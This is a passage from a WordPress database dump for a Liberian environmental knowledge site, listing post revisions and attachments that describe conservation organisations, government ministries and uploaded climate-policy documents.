21:23:32','',1614,'https://ekmsliberia.info/?p=3972',0,'revision','',0),(3973,42,'2021-08-17 21:33:46','2021-08-17 21:33:46','','wcf logo','','inherit','open','closed','','wcf-one','','','2021-08-17 21:34:26','2021-08-17 21:34:26','',3083,'https://ekmsliberia.info/wp-content/uploads/2020/06/wcf-one.png',0,'attachment','image/png',0),(3974,42,'2021-08-17 21:34:04','2021-08-17 21:34:04','The Wild Chimpanzee Foundation’s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioral diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people\r\n\r\nWCF implements conservation projects in Côte d’Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival\r\n','Wild Chimpanzee Foundation','','inherit','closed','closed','','3083-revision-v1','','','2021-08-17 21:34:04','2021-08-17 21:34:04','',3083,'https://ekmsliberia.info/?p=3974',0,'revision','',0),(3975,42,'2021-08-17 21:34:26','2021-08-17 21:34:26','The Wild Chimpanzee Foundation’s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioral diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people\r\n\r\nWCF implements conservation projects in Côte d’Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival.\r\n','Wild Chimpanzee Foundation','','inherit','closed','closed','','3083-revision-v1','','','2021-08-17 21:34:26','2021-08-17 21:34:26','',3083,'https://ekmsliberia.info/?p=3975',0,'revision','',0),(3976,42,'2021-08-17 21:35:50','2021-08-17 21:35:50','Green Stewards Inc. (GSI) is a registered for profit non-governmental organization that was founded in December 2018 by Olivia P. Livingstone, after recognizing the environmental needs and gaps in her Country, Liberia. GSI was founded to cultivate the minds of people and instill within them a sense of care towards the environment by creating awareness on environmental issues.\nGSI, being cognizant of the concerted efforts being made globally that are aimed at creating a sustainable planet is committed to finding innovative and sustainable mitigation measures to environmental challenges as a means of backing the sustainable movement.\nGreen Stewards Inc. was certified by the Environmental Protection Agency of The Republic of Liberia on March 29, 2019 to implement all of its projects.\n','Green Steward Inc.','','inherit','closed','closed','','3006-autosave-v1','','','2021-08-17 21:35:50','2021-08-17 21:35:50','',3006,'https://ekmsliberia.info/?p=3976',0,'revision','',0),(3977,42,'2021-08-17 21:37:05','2021-08-17 21:37:05','Green Stewards Inc. (GSI) is a registered for profit non-governmental organization that was founded in December 2018 by Olivia P. Livingstone, after recognizing the environmental needs and gaps in her Country, Liberia. GSI was founded to cultivate the minds of people and instill within them a sense of care towards the environment by creating awareness on environmental issues.\r\nGSI, being cognizant of the concerted efforts being made globally that are aimed at creating a sustainable planet is committed to finding innovative and sustainable mitigation measures to environmental challenges as a means of backing the sustainable movement.\r\nGreen Stewards Inc. was certified by the Environmental Protection Agency of The Republic of Liberia on March 29, 2019 to implement all of its projects.\r\n','Green Steward Inc.','','inherit','closed','closed','','3006-revision-v1','','','2021-08-17 21:37:05','2021-08-17 21:37:05','',3006,'https://ekmsliberia.info/?p=3977',0,'revision','',0),(3978,42,'2021-08-17 21:38:37','2021-08-17 21:38:37','Ever Green Environmental Corporation is an independent business enterprise focused on advancing environmental practices, products and services for residences, businesses and the community,Ever Green Environmental has developed a suite of \"Green Management Services\". We help business, institutional, commercial and government operators to set up effective waste management and recycling programs.\n\nWaste Audits involve sorting and analysis of garbage collected during a sample period from all business operations. This audit focuses on:\n<ul class=\"htp\">\n 	<li>What is being thrown out?</li>\n 	<li>What percentage of items being thrown out could have been recycled?</li>\n 	<li>How much of what is thrown out is true garbage?</li>\n</ul>\nThis waste audit identifies waste reduction opportunities, and sets parameters for the business\'s own \"R4\" Objectives - Reduce, Reuse, Recycle, and Recover.\n','Ever Green Recycling','','inherit','closed','closed','','3004-autosave-v1','','','2021-08-17 21:38:37','2021-08-17 21:38:37','',3004,'https://ekmsliberia.info/?p=3978',0,'revision','',0),(3979,42,'2021-08-17 21:38:50','2021-08-17 21:38:50','Ever Green Environmental Corporation is an independent business enterprise focused on advancing environmental practices, products and services for residences, businesses and the community,Ever Green Environmental has developed a suite of \"Green Management Services\". We help business, institutional, commercial and government operators to set up effective waste management and recycling programs.\r\n\r\nWaste Audits involve sorting and analysis of garbage collected during a sample period from all business operations. This audit focuses on:\r\n<ul class=\"htp\">\r\n 	<li>What is being thrown out?</li>\r\n 	<li>What percentage of items being thrown out could have been recycled?</li>\r\n 	<li>How much of what is thrown out is true garbage?</li>\r\n</ul>\r\nThis waste audit identifies waste reduction opportunities, and sets parameters for the business\'s own \"R4\" Objectives - Reduce, Reuse, Recycle, and Recover.\r\n','Ever Green Recycling','','inherit','closed','closed','','3004-revision-v1','','','2021-08-17 21:38:50','2021-08-17 21:38:50','',3004,'https://ekmsliberia.info/?p=3979',0,'revision','',0),(3980,42,'2021-08-17 21:40:18','2021-08-17 21:40:18','As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.\n\nConservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.\n\nBuilding upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.\n','Conservation International','','inherit','closed','closed','','1612-autosave-v1','','','2021-08-17 21:40:18','2021-08-17 21:40:18','',1612,'https://ekmsliberia.info/?p=3980',0,'revision','',0),(3981,42,'2021-08-17 21:40:24','2021-08-17 21:40:24','As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.\r\n\r\nConservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI’s reach is truly global.\r\n\r\nBuilding upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.\r\n','Conservation International','','inherit','closed','closed','','1612-revision-v1','','','2021-08-17 21:40:24','2021-08-17 21:40:24','',1612,'https://ekmsliberia.info/?p=3981',0,'revision','',0),(3982,42,'2021-08-17 22:10:40','2021-08-17 22:10:40','The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.\n\nSCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.\n','Society for the Conservation of Nature of Liberia','','inherit','closed','closed','','2769-autosave-v1','','','2021-08-17 22:10:40','2021-08-17 22:10:40','',2769,'https://ekmsliberia.info/?p=3982',0,'revision','',0),(3983,42,'2021-08-17 22:10:55','2021-08-17 22:10:55','The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.\r\n\r\nSCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.\r\n','Society for the Conservation of Nature of Liberia','','inherit','closed','closed','','2769-revision-v1','','','2021-08-17 22:10:55','2021-08-17 22:10:55','',2769,'https://ekmsliberia.info/?p=3983',0,'revision','',0),(3984,42,'2021-08-17 22:13:20','2021-08-17 22:13:20','The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.\n\nSCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.\n','German Liberian Cooperation','','inherit','closed','closed','','2965-autosave-v1','','','2021-08-17 22:13:20','2021-08-17 22:13:20','',2965,'https://ekmsliberia.info/?p=3984',0,'revision','',0),(3985,42,'2021-08-17 22:14:56','2021-08-17 22:14:56','The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.\r\n\r\nSCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.\r\n','German Liberian Cooperation','','inherit','closed','closed','','2965-revision-v1','','','2021-08-17 22:14:56','2021-08-17 22:14:56','',2965,'https://ekmsliberia.info/?p=3985',0,'revision','',0),(3986,42,'2021-08-17 22:23:02','2021-08-17 22:23:02','The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.\r\n','Ministry of Internal Affairs','','inherit','closed','closed','','1610-revision-v1','','','2021-08-17 22:23:02','2021-08-17 22:23:02','',1610,'https://ekmsliberia.info/?p=3986',0,'revision','',0),(3987,42,'2021-08-17 22:25:27','2021-08-17 22:25:27','LiMA coming soon!\r\n','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2021-08-17 22:25:27','2021-08-17 22:25:27','',1606,'https://ekmsliberia.info/?p=3987',0,'revision','',0),(3988,42,'2021-08-17 23:28:13','2021-08-17 23:28:13','','nbcl logo','','inherit','open','closed','','ncbil','','','2022-09-14 14:23:41','2022-09-14 14:23:41','',1604,'https://ekmsliberia.info/wp-content/uploads/2019/11/ncbil.png',0,'attachment','image/png',0),(3989,42,'2021-08-17 23:29:09','2021-08-17 23:29:09','National Concession information coming soon!		\r\n			','Liberia National Bureau of Concessions','','inherit','closed','closed','','1604-revision-v1','','','2021-08-17 23:29:09','2021-08-17 23:29:09','',1604,'https://ekmsliberia.info/?p=3989',0,'revision','',0),(3990,42,'2021-08-17 23:31:07','2021-08-17 23:31:07','The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.\n\nThrough its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.\n','Ministry of Transport','','inherit','closed','closed','','1598-autosave-v1','','','2021-08-17 23:31:07','2021-08-17 23:31:07','',1598,'https://ekmsliberia.info/?p=3990',0,'revision','',0),(3991,42,'2021-08-17 23:32:10','2021-08-17 23:32:10','The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.\r\n\r\nThrough its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.\r\n','Ministry of Transport','','inherit','closed','closed','','1598-revision-v1','','','2021-08-17 23:32:10','2021-08-17 23:32:10','',1598,'https://ekmsliberia.info/?p=3991',0,'revision','',0),(3992,42,'2021-08-17 23:33:51','2021-08-17 23:33:51','The Liberia Airport Authority is responsible for the supervision and management of all airports and their facilities in Liberia (international and domestic; with the exception of the Air Traffic Control (ATC), Fire and Rescue, Meteorology and Security (especially baggage and passenger screening) which is the responsibility of the Liberia Civil Aviation Authority in accordance with ICAO standards.\nThe Liberia Airport Authority is governed by an appointed board consisting of seven (7) members appointed by the President of the Republic of Liberia.\n','Liberia Airport Authority','','inherit','closed','closed','','1596-autosave-v1','','','2021-08-17 23:33:51','2021-08-17 23:33:51','',1596,'https://ekmsliberia.info/?p=3992',0,'revision','',0),(3993,42,'2021-08-17 23:34:02','2021-08-17 23:34:02','The Liberia Airport Authority is responsible for the supervision and management of all airports and their facilities in Liberia (international and domestic; with the exception of the Air Traffic Control (ATC), Fire and Rescue, Meteorology and Security (especially baggage and passenger screening) which is the responsibility of the Liberia Civil Aviation Authority in accordance with ICAO standards.\r\nThe Liberia Airport Authority is governed by an appointed board consisting of seven (7) members appointed by the President of the Republic of Liberia.\r\n','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2021-08-17 23:34:02','2021-08-17 23:34:02','',1596,'https://ekmsliberia.info/?p=3993',0,'revision','',0),(3994,42,'2021-08-17 23:35:34','2021-08-17 23:35:34','The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.\r\n\r\nThe Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.\r\n','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2021-08-17 23:35:34','2021-08-17 23:35:34','',1594,'https://ekmsliberia.info/?p=3994',0,'revision','',0),(3995,42,'2021-08-17 23:36:50','2021-08-17 23:36:50','<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.</p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.</p>		\n			','Central Agricultural Research Institute','','inherit','closed','closed','','1592-autosave-v1','','','2021-08-17 23:36:50','2021-08-17 23:36:50','',1592,'https://ekmsliberia.info/?p=3995',0,'revision','',0),(3996,42,'2021-08-17 23:37:50','2021-08-17 23:37:50','<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.</p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.</p>		\r\n			','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2021-08-17 23:37:50','2021-08-17 23:37:50','',1592,'https://ekmsliberia.info/?p=3996',0,'revision','',0),(3997,42,'2021-08-17 23:37:51','2021-08-17 23:37:51','National Legislature on Natural Resources Committee coming soon!		\n			','National Legislature on Natural Resource Committee','','inherit','closed','closed','','1590-autosave-v1','','','2021-08-17 23:37:51','2021-08-17 23:37:51','',1590,'https://ekmsliberia.info/?p=3997',0,'revision','',0),(3998,42,'2021-08-17 23:38:27','2021-08-17 23:38:27','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\n\nThe overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.\n','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-autosave-v1','','','2021-08-17 23:38:27','2021-08-17 23:38:27','',1588,'https://ekmsliberia.info/?p=3998',0,'revision','',0),(3999,42,'2021-08-17 23:39:01','2021-08-17 23:39:01','National Legislature on Natural Resources Committee coming soon!		\r\n			','National Legislature on Natural Resource Committee','','inherit','closed','closed','','1590-revision-v1','','','2021-08-17 23:39:01','2021-08-17 23:39:01','',1590,'https://ekmsliberia.info/?p=3999',0,'revision','',0),(4000,42,'2021-08-17 23:42:29','2021-08-17 23:42:29','','nafaa logo','','inherit','open','closed','','nafaa-one','','','2021-08-17 23:42:39','2021-08-17 23:42:39','',1588,'https://ekmsliberia.info/wp-content/uploads/2019/11/nafaa-one.png',0,'attachment','image/png',0),(4001,42,'2021-08-17 23:42:39','2021-08-17 23:42:39','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.\r\n\r\nThe overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.\r\n','National Fisheries & Aquaculture Authority','','inherit','closed','closed','','1588-revision-v1','','','2021-08-17 23:42:39','2021-08-17 23:42:39','',1588,'https://ekmsliberia.info/?p=4001',0,'revision','',0),(4002,42,'2021-08-17 23:45:11','2021-08-17 23:45:11','The MGCSP information coming soon!\n','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-autosave-v1','','','2021-08-17 23:45:11','2021-08-17 23:45:11','',1584,'https://ekmsliberia.info/?p=4002',0,'revision','',0),(4003,42,'2021-08-17 23:44:11','2021-08-17 23:44:11','<p>The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.</p><p>As custodian of the country’s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.</p>		\n			','Ministry of Finance and Development Planning','','inherit','closed','closed','','2704-autosave-v1','','','2021-08-17 23:44:11','2021-08-17 23:44:11','',2704,'https://ekmsliberia.info/?p=4003',0,'revision','',0),(4004,42,'2021-08-17 23:47:16','2021-08-17 23:47:16','','gender logo','','inherit','open','closed','','gender-3','','','2021-09-08 12:37:40','2021-09-08 12:37:40','',1584,'https://ekmsliberia.info/wp-content/uploads/2019/11/gender-.png',0,'attachment','image/png',0),(4005,42,'2021-08-17 23:47:35','2021-08-17 23:47:35','The MGCSP information coming soon!\r\n','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-revision-v1','','','2021-08-17 23:47:35','2021-08-17 23:47:35','',1584,'https://ekmsliberia.info/?p=4005',0,'revision','',0),(4006,42,'2021-08-17 23:48:36','2021-08-17 23:48:36','The Ministry of Gender, Children and Social Protection (MoGCSP) was created by an Executive Instrument 1 (E.I. 1) in January, 2013 as a successor to the Ministry of Women and Children\'s Affairs. The primary objective for its establishment was to have a Ministry responsible for policy formulation, coordination and monitoring and evaluation of Gender, Children and Social Protection issues within the context of the national development agenda.\r\nThis will lead to the achievement of gender equality, equity, the empowerment of women and girls, promoting the survival and development of children, thus ensuring their rights. It will also ensure harmonizing social protection interventions to better target the vulnerable, excluded and persons with disability and integrate fulfilment of their rights, empowerment and full participation into national development.\r\n\r\nThe primary objective for its establishment was to have a Ministry responsible for policy formulation, coordination and monitoring and evaluation of Gender, Children and Social Protection issues within the context of the national development agenda. This will lead to the achievement of gender equality, equity, the empowerment of women and girls, promoting the survival and development of children, thus ensuring their rights. It will also ensure harmonizing social protection interventions to better target the vulnerable, excluded and persons with disability and integrate fulfilment of their rights, empowerment and full participation into national development.\r\n','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-revision-v1','','','2021-08-17 23:48:36','2021-08-17 23:48:36','',1584,'https://ekmsliberia.info/?p=4006',0,'revision','',0),(4007,42,'2021-08-17 23:52:31','2021-08-17 23:52:31','<p>The Ministry of Finance and Development Planning, or MFDP for short, was created in 2013 by an Act of the National Legislature, in line with international financial management best practices. The new MFDP effectively replaces the Ministry of Finance and the Ministry of Planning and Economic Affairs, with the mandate to formulate, institutionalize and administer economic development, fiscal and tax policies for the promotion of sound and efficient management of financial resources of the government.</p><p>As custodian of the country’s economy, the MFDP combines public finance, development planning and economic management expertise and experience to effectively manage the economy.</p>		\r\n			','Ministry of Finance and Development Planning','','inherit','closed','closed','','2704-revision-v1','','','2021-08-17 23:52:31','2021-08-17 23:52:31','',2704,'https://ekmsliberia.info/?p=4007',0,'revision','',0),(4010,38,'2021-08-18 07:16:02','2021-08-18 07:16:02','','J.S.Datuama Cammue','','inherit','open','closed','','j-s-datuama-cammue-2','','','2021-08-18 07:16:02','2021-08-18 07:16:02','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/J.S.Datuama-Cammue.png',0,'attachment','image/png',0),(4011,38,'2021-08-18 07:20:47','2021-08-18 07:20:47','','CBD LIBERIA’ map','','inherit','open','closed','','cbd-liberia-map','','','2021-08-18 07:20:47','2021-08-18 07:20:47','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/CBD-LIBERIA-map.pdf',0,'attachment','application/pdf',0),(4014,38,'2021-08-18 07:33:40','2021-08-18 07:33:40','','Climate Change','','inherit','open','closed','','climate-change','','','2021-08-18 07:33:40','2021-08-18 07:33:40','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/Climate-Change.png',0,'attachment','image/png',0),(4015,38,'2021-08-18 07:40:02','2021-08-18 07:40:02','','2012_IUCN_Climate-Change-Gender-Action-Plan-Liberia','','inherit','open','closed','','2012_iucn_climate-change-gender-action-plan-liberia-2','','','2021-08-18 07:40:02','2021-08-18 07:40:02','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/2012_IUCN_Climate-Change-Gender-Action-Plan-Liberia.pdf',0,'attachment','application/pdf',0),(4017,38,'2021-08-18 07:51:21','2021-08-18 07:51:21','','WCF','','inherit','open','closed','','wcf-3','','','2021-08-18 07:51:21','2021-08-18 07:51:21','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/WCF.png',0,'attachment','image/png',0),(4018,38,'2021-08-18 07:56:38','2021-08-18 07:56:38','','2014_gvl_report_','','inherit','open','closed','','2014_gvl_report_','','','2021-08-18 07:56:38','2021-08-18 07:56:38','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/2014_gvl_report_.pdf',0,'attachment','application/pdf',0),(4020,38,'2021-08-18 08:07:55','2021-08-18 08:07:55','','National Policy','','inherit','open','closed','','national-policy','','','2021-08-18 08:07:55','2021-08-18 08:07:55','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/National-Policy.png',0,'attachment','image/png',0),(4021,38,'2021-08-18 08:08:43','2021-08-18 08:08:43','','2018 UNDP_lr_National Policy and Response Strategy on Climate Change (1)','','inherit','open','closed','','2018-undp_lr_national-policy-and-response-strategy-on-climate-change-1-2','','','2021-08-18 08:08:43','2021-08-18 08:08:43','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/2018-UNDP_lr_National-Policy-and-Response-Strategy-on-Climate-Change-1.pdf',0,'attachment','application/pdf',0),(4022,38,'2021-08-18 08:14:38','2021-08-18 08:14:38','','National Policy','','inherit','open','closed','','national-policy-2','','','2021-08-18 08:14:38','2021-08-18 08:14:38','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/National-Policy-1.png',0,'attachment','image/png',0),(4023,38,'2021-08-18 08:15:15','2021-08-18 08:15:15','','2018 UNDP_lr_National Policy and Response Strategy on Climate Change (1)','','inherit','open','closed','','2018-undp_lr_national-policy-and-response-strategy-on-climate-change-1-3','','','2021-08-18 08:15:15','2021-08-18 08:15:15','',0,'https://ekmsliberia.info/wp-content/uploads/2021/08/2018-UNDP_lr_National-Policy-and-Response-Strategy-on-Climate-Change-1-1.pdf',0,'attachment','application/pdf',0),(4024,42,'2021-08-18 10:40:31','2021-08-18 10:40:31','','unccd','','inherit','open','closed','','untitled-3','','','2021-08-18 10:40:39','2021-08-18 10:40:39','',3275,'https://ekmsliberia.info/wp-content/uploads/2020/12/Untitled.png',0,'attachment','image/png',0),(4026,42,'2021-08-18 10:45:08','2021-08-18 10:45:08','','Untitled2','','inherit','open','closed','','untitled2','','','2021-08-18 10:45:08','2021-08-18 10:45:08','',3226,'https://ekmsliberia.info/wp-content/uploads/2020/11/Untitled2.png',0,'attachment','image/png',0),(4027,38,'2021-08-18 10:46:12','2021-08-18 10:46:12','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-18 10:46:12','2021-08-18 10:46:12','',3901,'https://ekmsliberia.info/?p=4027',0,'revision','',0),(4028,38,'2021-08-18 10:47:55','2021-08-18 10:47:55','<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-18 10:47:55','2021-08-18 10:47:55','',3901,'https://ekmsliberia.info/?p=4028',0,'revision','',0),(4029,38,'2021-08-18 10:49:05','2021-08-18 10:49:05','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-18 10:49:05','2021-08-18 10:49:05','',3901,'https://ekmsliberia.info/?p=4029',0,'revision','',0),(4030,38,'2021-08-18 10:49:46','2021-08-18 10:49:46','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-18 10:49:46','2021-08-18 10:49:46','',3901,'https://ekmsliberia.info/?p=4030',0,'revision','',0),(4031,38,'2021-08-18 10:51:18','2021-08-18 10:51:18','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-18 10:51:18','2021-08-18 10:51:18','',3901,'https://ekmsliberia.info/?p=4031',0,'revision','',0),(4032,42,'2021-08-18 11:00:53','2021-08-18 11:00:53','','Untitled3','','inherit','open','closed','','untitled3','','','2021-08-18 11:00:53','2021-08-18 11:00:53','',3109,'https://ekmsliberia.info/wp-content/uploads/2020/07/Untitled3.png',0,'attachment','image/png',0),(4034,38,'2021-08-18 11:02:35','2021-08-18 11:02:35','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-18 11:02:35','2021-08-18 11:02:35','',3901,'https://ekmsliberia.info/?p=4034',0,'revision','',0),(4035,42,'2021-08-18 11:03:34','2021-08-18 11:03:34','This Annual Report represents activities of the Ministry of Agriculture for the year 2006 in support of Government’s effort to restore productive capacities in the agricultural sector. Because of its strategic role for employment creation, poverty reduction, food security and income generation, the Ministry prepared an interim policy document as a precursor for the formulation and promulgation of a Comprehensive Agricultural Development Policy and a National Agricultural Investment Strategy. With funding from the current fiscalnbudget, which was increased by over 250% from a five-year outlay of less than US$1 million to over US$3.2 million, the Ministry, among other things, began rehabilitating the Central Agricultural Research Institute (CARI) located in Bong County. As a result, nine New Rice of\nAfrica (NERICA) varieties and four high yielding local varieties are under multiplication at CARI. Additionally, 19 elite IITA cassava cultivars are being multiplied at CARI and 241 IITA cassava genotypes are undergoing testing at CARI and in six other counties. Similarly, the Ministry began reactivating the national extension system, providing assistance to local initiatives such as the Kpein Seed Multiplication Project in Nimba County. While contributing to food security and poverty alleviation, these efforts are also helping reestablish government’s\npresence and visibility throughout the country.','Ministry of Agriculture ANNUAL REPORT 2006','','inherit','closed','closed','','3109-autosave-v1','','','2021-08-18 11:03:34','2021-08-18 11:03:34','',3109,'https://ekmsliberia.info/?p=4035',0,'revision','',0),(4036,38,'2021-08-18 11:04:44','2021-08-18 11:04:44','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-18 11:04:44','2021-08-18 11:04:44','',3901,'https://ekmsliberia.info/?p=4036',0,'revision','',0),(4037,38,'2021-08-18 11:06:00','2021-08-18 11:06:00','<h2>Useful Links</h2>		\n			<h2>Existing System</h2>','Institutions-single-post','','inherit','closed','closed','','3901-revision-v1','','','2021-08-18 11:06:00','2021-08-18 11:06:00','',3901,'https://ekmsliberia.info/?p=4037',0,'revision','',0),(4039,38,'2021-08-18 11:11:41','2021-08-18 11:11:41','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-18 11:11:41','2021-08-18 11:11:41','',3834,'https://ekmsliberia.info/?p=4039',0,'revision','',0),(4040,38,'2021-08-18 11:15:34','2021-08-18 11:15:34','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-18 11:15:34','2021-08-18 11:15:34','',3834,'https://ekmsliberia.info/?p=4040',0,'revision','',0),(4041,38,'2021-08-18 11:18:00','2021-08-18 11:18:00','<h2>Access environmental reports, publications, policies and other related documents</h2>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 11:18:00','2021-08-18 11:18:00','',91,'https://ekmsliberia.info/?p=4041',0,'revision','',0),(4042,38,'2021-08-18 11:18:00','2021-08-18 11:18:00','<h2>Access environmental reports, publications, policies and other related documents</h2>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 11:18:00','2021-08-18 11:18:00','',91,'https://ekmsliberia.info/?p=4042',0,'revision','',0),(4043,38,'2021-08-18 11:18:00','2021-08-18 11:18:00','<h2>Access environmental reports, publications, policies and other related documents</h2>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 11:18:00','2021-08-18 11:18:00','',91,'https://ekmsliberia.info/?p=4043',0,'revision','',0),(4044,38,'2021-08-18 11:21:02','2021-08-18 11:21:02','<h2>Access environmental reports, publications, policies and other related documents</h2>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 11:21:02','2021-08-18 11:21:02','',91,'https://ekmsliberia.info/?p=4044',0,'revision','',0),(4045,38,'2021-08-18 11:21:02','2021-08-18 11:21:02','<h2>Access environmental reports, publications, policies and other related documents</h2>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 11:21:02','2021-08-18 11:21:02','',91,'https://ekmsliberia.info/?p=4045',0,'revision','',0),(4046,38,'2021-08-18 11:21:02','2021-08-18 11:21:02','<h2>Access environmental reports, publications, policies and other related documents</h2>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 11:21:02','2021-08-18 